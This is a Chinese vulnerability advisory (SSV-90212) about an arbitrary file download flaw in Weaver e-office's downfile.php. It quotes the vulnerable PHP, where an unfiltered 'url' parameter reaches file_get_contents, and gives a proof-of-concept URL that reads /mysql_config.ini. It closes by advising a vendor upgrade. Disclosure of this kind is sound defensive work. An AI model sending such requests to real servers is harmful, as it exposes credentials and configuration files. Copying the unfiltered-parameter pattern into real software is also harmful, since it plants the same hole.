泛微e-office E-mobile/Data/downfile.php url参数任意文件下载

基本字段

漏洞编号：: SSV-90212

披露/发现时间：: 未知

提交时间：: 2016-01-06

漏洞等级：

漏洞类别：: 任意文件下载

影响组件：: weaver OA
(8.5)

漏洞作者：: 未知

提交者：: Disorder

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Disorder 共获得 0.9KB

### 漏洞信息：泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验。泛微e-office存在任意文件上传漏洞导致敏感信息泄漏。 ### 漏洞分析：漏洞存在于E-mobile/Data/downfile.php ``` $fileurl = $_REQUEST['url']; $sessionstr = $_REQUEST['sessionkey']; $strexplode = explode( ",", $sessionstr ); $sessionkey = $strexplode[0]; $curr_user_id = $strexplode[1]; $rooturl = "http://".$_SERVER['HTTP_HOST']; $checkurl = explode( "/", $fileurl ); if ( $checkurl[1] == "flowimg" ) { $url = $rooturl."/E-mobile/flowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else if ( $checkurl[1] == "freeflowimg" ) { $url = $rooturl."/E-mobile/flow/freeflowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3]; $type = "png"; } else { $url = $rooturl.$fileurl; $filetype = pathinfo( $fileurl ); $type = $filetype['extension']; } if ( $type == "css" ) { header( "Content-Type: text/css" ); } else if ( $type == "js" ) { header( "Content-Type: application/javascript" ); } else if ( $type == "jpg" || $type == "jpeg" || $type == "JPG" || $type == "JPEG" ) { header( "Content-Type: image/jpeg" ); } else if ( $type == "png" || $type == "PNG" ) { header( "Content-Type: image/png" ); } else if ( $type == "bmp" || $type == "BMP" ) { header( "Content-Type: image/bmp" ); } else if ( $type == "gif" || $type == "GIF" ) { header( "Content-Type: image/gif" ); } else if ( $type == "pdf" || $type == "PDF" ) { header( "Content-Type: application/pdf" ); } else if ( $type == "rar" || $type == "RAR" ) { header( "Content-Type: application/x-rar-compressed" ); } else if ( $type == "exe" || $type == "EXE" ) { header( "Content-Type: application/octet-stream" ); } else if ( $type == "zip" || $type == "ZIP" ) { header( "Content-Type: application/zip" ); } else if ( $type == "doc" || $type == "DOC" ) { header( "Content-Type: application/msword" ); } else if ( $type == "docx" || $type == "DOCX" ) { header( "Content-Type: application/msword" ); } else if ( $type == "xls" || $type == "XLS" || $type == "csv" || $type == "CSV" ) { header( "Content-Type: application/vnd.ms-excel" ); } else if ( $type == "ppt" || $type == "PPT" ) { header( "Content-Type: application/vnd.ms-powerpoint" ); } else if ( $type == "txt" || $type == "TXT" ) { header( "Content-Type: text/plain" ); } else { header( "Content-Type: application/force-download" ); } $content = file_get_contents( $url ); echo $content; ?> ``` 可以看出url参数没有有效的过滤，导致可任意文件下载。可使用以下URl测试下载源码： ``` http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/mysql_config.ini ``` ### 解决方案：建议关注官网网站，及时升级最新版本： http://www.weaver.com.cn/